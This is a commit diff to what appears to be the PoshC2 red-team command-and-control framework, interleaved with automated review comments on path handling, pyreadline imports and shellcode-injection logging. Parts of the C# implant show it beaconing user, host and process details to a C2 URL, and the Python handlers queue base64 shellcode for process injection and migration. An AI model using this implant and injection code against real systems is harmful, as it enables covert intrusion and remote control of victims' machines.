Use pyreadline for Windows compatibility and when injecting shellcode log filename

temp
m0rv4i 2019-04-24 18:18:30 +01:00
parent ae3c5ed3cf
commit 0aaa5ce53c
11 changed files with 36 additions and 31 deletions


@ -1,4 +1,5 @@
#!/usr/bin/env python #!/usr/bin/env python
import os
from UrlConfig import UrlConfig from UrlConfig import UrlConfig
HOST_NAME = '0.0.0.0' HOST_NAME = '0.0.0.0'
@ -56,12 +57,12 @@ ServerHeader = "Apache"
Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}" Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
# DO NOT CHANGE # # DO NOT CHANGE #
FilesDirectory = "%sFiles/" % POSHDIR FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
PayloadsDirectory = "%spayloads/" % ROOTDIR PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
ModulesDirectory = "%sModules/" % POSHDIR ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
DownloadsDirectory = "%sdownloads/" % ROOTDIR DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
ReportsDirectory = "%sreports/" % ROOTDIR ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
Database = "%s/PowershellC2.SQLite" % ROOTDIR Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
# DO NOT CHANGE # # DO NOT CHANGE #
# These rules aren't needed as you'll find them auto-generated within the project folder now. # These rules aren't needed as you'll find them auto-generated within the project folder now.
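Review bot: The rewritten path constants rely on two different conventions: FilesDirectory through ReportsDirectory append `os.sep` to a prefix that must already end in a separator, while Database inserts one before the file name, so each line only yields a clean path if POSHDIR/ROOTDIR (defined outside this hunk) carry or lack a trailing separator exactly as that line expects. `os.path.join` removes the dependency on either platform: `FilesDirectory = os.path.join(POSHDIR, "Files", "")` keeps the trailing separator the rest of the code seems to expect, and `Database = os.path.join(ROOTDIR, "PowershellC2.SQLite")` is correct whether or not ROOTDIR ends in one. The same substitution applies to the other four directory lines.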


@ -1,9 +1,9 @@
#!/usr/bin/python #!/usr/bin/python
import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
from Config import HTTPResponses, POSHDIR, PayloadsDirectory from Config import HTTPResponses, POSHDIR, PayloadsDirectory
from Utils import randomuri from Utils import randomuri
from TabComplete import readline, tabCompleter from TabComplete import tabCompleter
from Help import COMMANDS from Help import COMMANDS
def default_response(): def default_response():
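Review bot: `import readline, pyreadline.rlmain` makes this module — and, in the same commit, C2Server, PSHandler and TabComplete — import pyreadline unconditionally, so a Linux install now fails without a package whose only purpose is emulating GNU readline on the Windows console, and `pyreadline.rlmain` is never referenced afterwards, so it is at most an import for side effects. As far as I recall pyreadline also installs a top-level `readline` shim, in which case the plain `import readline` already resolves to it on Windows and the second name is redundant; confirm that before relying on it. Either way the import should be platform-guarded so neither OS can break on it, e.g. `import readline` followed by `if os.name == 'nt': import pyreadline.rlmain  # Windows readline emulation`, with a comment recording why it exists.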


@ -77,7 +77,7 @@ public class Program
x.Headers.Add("Referrer", "#REPLACEREFERER#"); x.Headers.Add("Referrer", "#REPLACEREFERER#");
if (null != cookie) if (null != cookie)
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}"); x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
return x; return x;
} }
@ -188,7 +188,7 @@ public class Program
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id; int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#"; var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#"; String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
var primer = GetWebRequest(Encryption(key, o)).DownloadString(s); var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
@ -331,7 +331,7 @@ public class Program
internal static String GenerateUrl() internal static String GenerateUrl()
{ {
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)]; string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}"; return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
} }
} }
@ -502,7 +502,7 @@ public class Program
beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value); beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
} }
else else
output.AppendLine($@"[X] Invalid time ""{c}"""); output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
} }
output.AppendLine(strOutput.ToString()); output.AppendLine(strOutput.ToString());
@ -519,7 +519,7 @@ public class Program
catch (Exception e) catch (Exception e)
{ {
var task = Encryption(Key, "Error"); var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true); var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
var outputBytes = System.Convert.FromBase64String(eroutput); var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes); var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes); GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
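Review bot: Nothing in the file records why every `$"..."` interpolation was rewritten as `String.Format`, so the next edit is likely to reintroduce interpolation and silently break the build it was removed for. A one-line comment at the first occurrence (the `Cookie` header in GetWebRequest, whose body begins above this hunk) would prevent that, e.g. `// Use String.Format rather than $"..." — this source must compile under the .NET 4.0 csc (C# 5), which has no string interpolation`. The C# 5 constraint is my inference from the `v4.0.30319\csc.exe` path used in Payloads.py in this same commit; confirm this file goes through that compiler before wording the comment that way.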


@ -1,6 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
import sys, re, os, readline, time, subprocess, traceback, signal, argparse import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
from sqlite3 import Error from sqlite3 import Error
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails


@ -1,4 +1,4 @@
import base64, re, traceback, os, sys import base64, re, traceback, os, sys, readline, pyreadline.rlmain
from Alias import ps_alias from Alias import ps_alias
from Colours import Colours from Colours import Colours
from Utils import randomuri, validate_sleep_time from Utils import randomuri, validate_sleep_time
@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
from Opsec import ps_opsec from Opsec import ps_opsec
from Payloads import Payloads from Payloads import Payloads
from Utils import argp, load_file, gen_key from Utils import argp, load_file, gen_key
from TabComplete import readline, tabCompleter from TabComplete import tabCompleter
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload): def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
try: try:
@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
shellcodefile = load_file(path) shellcodefile = load_file(path)
if shellcodefile != None: if shellcodefile != None:
arch = "64" arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
except Exception as e: except Exception as e:
print ("Error loading file: %s" % e) print ("Error loading file: %s" % e)
@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
arch = "86" arch = "86"
if implant_comms == "Normal": if implant_comms == "Normal":
shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)) path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
elif implant_comms == "Daisy": elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ") daisyname = raw_input("Name required: ")
shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)) path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
shellcodefile = load_file(path)
elif implant_comms == "Proxy": elif implant_comms == "Proxy":
shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)) path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
shellcodefile = load_file(path)
check_module_loaded("Inject-Shellcode.ps1", randomuri, user) check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri) new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri) new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
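Review bot: The three new `path = "%spayloads/..." % (ROOTDIR, ...)` lines in migrate hard-code `/`, while Config.py in this same commit switches its directory constants to `os.sep`, so the Windows-compatibility work stops at this function; `os` is already imported here, so `path = os.path.join(ROOTDIR, "payloads", "Posh_v4_x%s_Shellcode.bin" % arch)` (and likewise for the Daisy and Proxy forms) keeps it consistent. Separately, `load_file` can evidently return None — handle_ps_command checks `if shellcodefile != None` before encoding — but migrate feeds the result straight into `base64.b64encode` on the final `new_task` line, and when `implant_comms` matches none of the three branches `path` is unbound at the same line. Initialising `path = None` before the branches and returning early with a message when `shellcodefile is None` covers both; migrate's signature is the hunk header, so the rest of its body is outside the view.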


@ -190,7 +190,8 @@ class Payloads(object):
output_file.write(cs9) output_file.write(cs9)
output_file.close() output_file.close()
if os.name == 'nt': if os.name == 'nt':
compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name) compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
compileexe = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
else: else:
compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name) compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name) compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
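Review bot: The two new Windows compile strings interpolate `self.BaseDirectory` and `name` unquoted, so a BaseDirectory containing a space (`C:\Users\Some User\...`) splits both the `-out:` argument and the source path into separate tokens and the build fails; if the string is handed to a shell (the call is outside this hunk) any shell metacharacters in those values are forwarded as well. At minimum quote the two paths — `-out:\"%s%sdropper_cs.dll\" \"%s%sdropper.cs\"` — or, better, build an argv list and run it with `shell=False`, which is what the mono branch would benefit from too. The trailing space left at the end of both strings looks accidental.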


@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
try: try:
shellcodefile = load_file(path) shellcodefile = load_file(path)
if shellcodefile != None: if shellcodefile != None:
new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri) new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
except Exception as e: except Exception as e:
print ("Error loading file: %s" % e) print ("Error loading file: %s" % e)
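Review bot: Nothing at this call site explains the appended `#%s`; it reads like a stray comment marker on a run-exe command, and the contract — TaskHandler.newTask cuts the command at the `#` before queueing it and logs only the suffix — lives in another file. Add a line above the `new_task` call such as `# "#<file>" is a marker for TaskHandler.newTask: logged as the loaded filename and stripped before the task reaches the implant`. Note in the same comment that `params` (operator-typed) sits between the base64 blob and the marker, so a `#` inside params would be taken as the marker; rejecting such params here is the simplest guard.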


@ -1,6 +1,6 @@
#!/usr/bin/python #!/usr/bin/python
import os, sys, readline, glob import os, sys, readline, pyreadline.rlmain, glob
class tabCompleter(object): class tabCompleter(object):
""" """


@ -19,12 +19,9 @@ def newTask(path):
user_command = command user_command = command
hostinfo = DB.get_hostinfo(RandomURI) hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now() now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) : if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:] user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
elif (command.lower().startswith("run-exe core.program core inject-shellcode")) : command = command[:command.index("#")]
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
elif (command.lower().startswith('upload-file')): elif (command.lower().startswith('upload-file')):
filepath = command.replace('upload-file', '') filepath = command.replace('upload-file', '')
if ";" in filepath: if ";" in filepath:
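Review bot: `command.index("#")` in the merged `$shellcode64`/`$shellcode86`/`run-exe ... inject-shellcode` branch raises ValueError when no `#` is present, so any matching command that reaches newTask from a path not updated in this commit aborts task creation instead of being logged, and for the Sharp form the operator-typed params sit between the blob and the marker, so a `#` in them cuts the command at the wrong place and sends a truncated task to the implant. The base64 alphabet contains no `#`, so splitting on the last one is safe for the blob; keep the previous truncated log line as the fallback when no marker is found. newTask's signature is in the hunk header and the rest of its body is outside the view.

```python
            # "#<file>" suffix is added by the inject-shellcode handlers for logging only
            cmd, sep, fname = command.rpartition("#")
            if sep:
                user_command = "Inject Shellcode: %s" % fname
                command = cmd
            else:
                user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
```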


@ -14,6 +14,8 @@ Add a configurable jitter to all implants
Update the notifications config if it is changed in the Config.py Update the notifications config if it is changed in the Config.py
Add NotificationsProjectName in Config.py which is displayed in notifications message Add NotificationsProjectName in Config.py which is displayed in notifications message
Add fpc script which searches the Posh DB for a particular command Add fpc script which searches the Posh DB for a particular command
Use pyreadline for Windows compatibility
Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
4.8 (13/02/19) 4.8 (13/02/19)
============== ==============


@ -2,3 +2,4 @@ pyopenssl
pandas pandas
pyttsx3 pyttsx3
pycrypto pycrypto
pyreadline
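Review bot: `pyreadline` is added unpinned and without a platform marker, so every Linux install now pulls a package that exists only to emulate GNU readline on the Windows console, and each install resolves to whatever version PyPI serves at the time. A PEP 508 environment marker keeps it to the platform that needs it — `pyreadline; sys_platform == "win32"` — and pinning the version makes the Windows build reproducible; the other entries in this file are unpinned too, which is a separate supply-chain concern for a C2 server's install. The code still uses `raw_input` (PSHandler in this commit), so it appears to target Python 2; check that the pyreadline release you pin supports the interpreter you actually ship with.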